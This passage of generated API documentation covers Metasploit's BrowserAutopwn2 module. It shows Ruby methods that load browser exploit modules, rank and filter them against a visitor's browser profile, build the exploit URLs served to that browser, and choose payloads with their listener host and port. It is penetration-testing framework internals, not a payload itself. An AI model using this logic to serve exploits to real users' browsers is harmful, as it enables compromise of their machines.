<li><span class='object_link'><a href="#rm_exploit_jobs-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#rm_exploit_jobs (method)">The method for cleaning up jobs.</a></span></li>
<li>The method for removing target information.</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
109
110
111
112
113
114
115
116</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 109</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cleanup'>cleanup</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Cleaning up jobs...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='id identifier rubyid_configure_job_output'>configure_job_output</span><span class='lparen'>(</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_clear_browser_profiles'>clear_browser_profiles</span>
<span class='id identifier rubyid_rm_exploit_jobs'>rm_exploit_jobs</span>
<span class='id identifier rubyid_rm_payload_jobs'>rm_payload_jobs</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="configure_job_output-instance_method">
#<strong>configure_job_output</strong>(on = true) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Configures the output of sub-jobs</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
495
496
497
498
499
500
501
502
503
504
505</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 495</span>
<span class='kw'>def</span> <span class='id identifier rubyid_configure_job_output'>configure_job_output</span><span class='lparen'>(</span><span class='id identifier rubyid_on'>on</span><span class='op'>=</span><span class='kw'>true</span><span class='rparen'>)</span>
<span class='lparen'>(</span><span class='ivar'>@exploit_job_ids</span> <span class='op'>+</span> <span class='ivar'>@payload_job_ids</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_jid'>jid</span><span class='op'>|</span>
<span class='id identifier rubyid_job'>job</span> <span class='op'>=</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='lbracket'>[</span><span class='id identifier rubyid_jid'>jid</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rbracket'>]</span>
<span class='kw'>next</span> <span class='kw'>unless</span> <span class='id identifier rubyid_job'>job</span>
<span class='id identifier rubyid_job'>job</span><span class='period'>.</span><span class='id identifier rubyid_ctx'>ctx</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='kw'>next</span> <span class='kw'>unless</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_respond_to?'>respond_to?</span> <span class='symbol'>:user_output</span>
<span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_user_output'>user_output</span> <span class='op'>=</span> <span class='id identifier rubyid_on'>on</span> <span class='op'>?</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_user_output'>user_output</span> <span class='op'>:</span> <span class='kw'>nil</span>
<span class='kw'>break</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="finalize_sorted_modules-instance_method">
#<strong>finalize_sorted_modules</strong>(bap_groups) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Modifies @bap_exploit by replacing it with the rearranged module list.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>bap_groups</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A grouped module list.</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#bap_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#bap_exploits (method)">The read-only attribute.</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
250
251
252
253
254
255
256
257
258</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 250</span>
<span class='kw'>def</span> <span class='id identifier rubyid_finalize_sorted_modules'>finalize_sorted_modules</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
<span class='ivar'>@bap_exploits</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='period'>.</span><span class='id identifier rubyid_each_pair'>each_pair</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_ranking'>ranking</span><span class='comma'>,</span> <span class='id identifier rubyid_module_list'>module_list</span><span class='op'>|</span>
<span class='id identifier rubyid_module_list'>module_list</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='kw'>break</span> <span class='kw'>if</span> <span class='ivar'>@bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>&gt;=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MaxExploitCount</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='ivar'>@bap_exploits</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_custom_404_url-instance_method">
#<strong>get_custom_404_url</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the custom 404 URL set by the user</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
733
734
735</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 733</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_custom_404_url'>get_custom_404_url</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Custom404</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_exploit_urls-instance_method">
#<strong>get_exploit_urls</strong>(cli, request) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a list of exploit URLs. This is used by #build_html so the client can load our exploits one by one.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#build_html-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#build_html (method)">#build_html</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 653</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_exploit_urls'>get_exploit_urls</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_exploit_list'>exploit_list</span> <span class='op'>=</span> <span class='id identifier rubyid_get_suitable_exploits'>get_suitable_exploits</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_exploit_list'>exploit_list</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_mod'>mod</span><span class='op'>|</span>
<span class='id identifier rubyid_proto'>proto</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>https</span><span class='tstring_end'>&#39;</span></span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>http</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># We haven&#39;t URIHOST and URIPORT into account here because
</span> <span class='comment'># the framework uses them only on `get_uri`
</span> <span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>!=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0.0.0.0</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='id identifier rubyid_srvhost'>srvhost</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>!=</span> <span class='int'>0</span>
<span class='id identifier rubyid_port'>port</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_port'>port</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_resource'>resource</span> <span class='op'>=</span> <span class='id identifier rubyid_mod'>mod</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_url'>url</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_proto'>proto</span><span class='embexpr_end'>}</span><span class='tstring_content'>://</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_to_authority'>to_authority</span><span class='lparen'>(</span><span class='id identifier rubyid_host'>host</span><span class='comma'>,</span> <span class='id identifier rubyid_port'>port</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_resource'>resource</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_url'>url</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_payload_lhost-instance_method">
#<strong>get_payload_lhost</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the selected payloads LHOST. If no LHOST is set by the user (via the datastore option), then the method automatically generates one by Rex.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
294
295
296</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 294</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_payload_lhost'>get_payload_lhost</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_source_address'>source_address</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_selected_payload_lport-instance_method">
#<strong>get_selected_payload_lport</strong>(platform) &#x21d2; <tt>Integer</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the selected payloads LPORT.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>platform</span>
<span class='type'>(<tt>Symbol</tt>)</span>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
285
286
287</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 285</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_selected_payload_lport'>get_selected_payload_lport</span><span class='lparen'>(</span><span class='id identifier rubyid_platform'>platform</span><span class='rparen'>)</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>PAYLOAD_</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span><span class='embexpr_end'>}</span><span class='tstring_content'>_LPORT</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_selected_payload_name-instance_method">
#<strong>get_selected_payload_name</strong>(platform) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a payload name. Either this will be the users choice, or falls back to a default one.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>platform</span>
<span class='type'>(<tt>Symbol</tt>)</span>
&mdash;
<div class='inline'>
<p>Platform name.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload name.</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#DEFAULT_PAYLOADS-constant" title="Msf::Exploit::Remote::BrowserAutopwn2::DEFAULT_PAYLOADS (constant)">The default settings.</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
266
267
268
269
270
271
272
273
274
275
276
277
278</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 266</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_selected_payload_name'>get_selected_payload_name</span><span class='lparen'>(</span><span class='id identifier rubyid_platform'>platform</span><span class='rparen'>)</span>
<span class='id identifier rubyid_payload_name'>payload_name</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>PAYLOAD_</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='comment'># The payload is legit, we can use it.
</span> <span class='comment'># Avoid #create seems faster
</span> <span class='kw'>return</span> <span class='id identifier rubyid_payload_name'>payload_name</span> <span class='kw'>if</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_payloads'>payloads</span><span class='period'>.</span><span class='id identifier rubyid_module_refnames'>module_refnames</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_payload_name'>payload_name</span><span class='rparen'>)</span>
<span class='id identifier rubyid_default'>default</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#DEFAULT_PAYLOADS-constant" title="Msf::Exploit::Remote::BrowserAutopwn2::DEFAULT_PAYLOADS (constant)">DEFAULT_PAYLOADS</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_platform'>platform</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:payload</span><span class='rbracket'>]</span>
<span class='comment'># The user has configured some unknown payload that we can&#39;t use,
</span> <span class='comment'># fall back to default.
</span> <span class='id identifier rubyid_default'>default</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_suitable_exploits-instance_method">
#<strong>get_suitable_exploits</strong>(cli, request) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a list of suitable exploits for the current client based on what #sort_bap_exploits gives us. It will do a global exploitable requirement check (the best it can do). Theres actually a target-specific exploitable requirement check too, but that is performed in BrowserExploitServer while the exploit is being served. In other words, it is possible #get_suitable_exploits might not be 100% accurate (but pretty good, it depends on how the exploit dev accurately defines his/her global requirements), but the exploit always has a choice to bail at the last second if it decides it is actually not suitable for the client. That way we dont risk being too wreckless with our attack.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 587</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_suitable_exploits'>get_suitable_exploits</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_tag'>tag</span> <span class='op'>=</span> <span class='id identifier rubyid_retrieve_tag'>retrieve_tag</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_profile_info'>profile_info</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_profile'>browser_profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_tag'>tag</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_bap_exploits'>bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='kw'>if</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_get_bad_requirements'>get_bad_requirements</span><span class='lparen'>(</span><span class='id identifier rubyid_profile_info'>profile_info</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ShowExploitList</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_show_exploit_list'>show_exploit_list</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='comma'>,</span> <span class='id identifier rubyid_tag'>tag</span><span class='comma'>,</span> <span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="group_bap_modules-instance_method">
#<strong>group_bap_modules</strong> &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Breaks @bap_exploits into groups for sorting purposes.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A module list grouped by rank.</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#bap_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#bap_exploits (method)">#bap_exploits</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
232
233
234
235
236
237
238
239
240
241
242</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 232</span>
<span class='kw'>def</span> <span class='id identifier rubyid_group_bap_modules'>group_bap_modules</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span>
<span class='const'><span class='object_link'><a href="../../../Msf.html#RankingName-constant" title="Msf::RankingName (constant)">RankingName</a></span></span><span class='period'>.</span><span class='id identifier rubyid_each_pair'>each_pair</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_ranking'>ranking</span><span class='comma'>,</span> <span class='id identifier rubyid_value'>value</span><span class='op'>|</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='lbracket'>[</span><span class='id identifier rubyid_ranking'>ranking</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_bap_exploits'>bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_rank'>rank</span> <span class='op'>!=</span> <span class='id identifier rubyid_ranking'>ranking</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='lbracket'>[</span><span class='id identifier rubyid_ranking'>ranking</span><span class='rbracket'>]</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="init_exploits-instance_method">
#<strong>init_exploits</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Returns all the found exploit modules that support BrowserExploitServer by going through all the exploits from the framework object. All the usable exploits will be stored in #bap_exploits.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 49</span>
<span class='kw'>def</span> <span class='id identifier rubyid_init_exploits'>init_exploits</span>
<span class='comment'># First we&#39;re going to avoid using #find_all because that gets very slow.
</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_exploits'>exploits</span><span class='period'>.</span><span class='id identifier rubyid_module_refnames'>module_refnames</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_fullname'>fullname</span><span class='op'>|</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='op'>!</span><span class='id identifier rubyid_fullname'>fullname</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>browser</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>||</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_fullname'>fullname</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>exploit/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fullname'>fullname</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='comment'># The user gets to specify which modules to include/exclude
</span> <span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>INCLUDE_PATTERN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_fullname'>fullname</span> <span class='op'>!~</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>INCLUDE_PATTERN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXCLUDE_PATTERN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_fullname'>fullname</span> <span class='op'>=~</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>EXCLUDE_PATTERN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
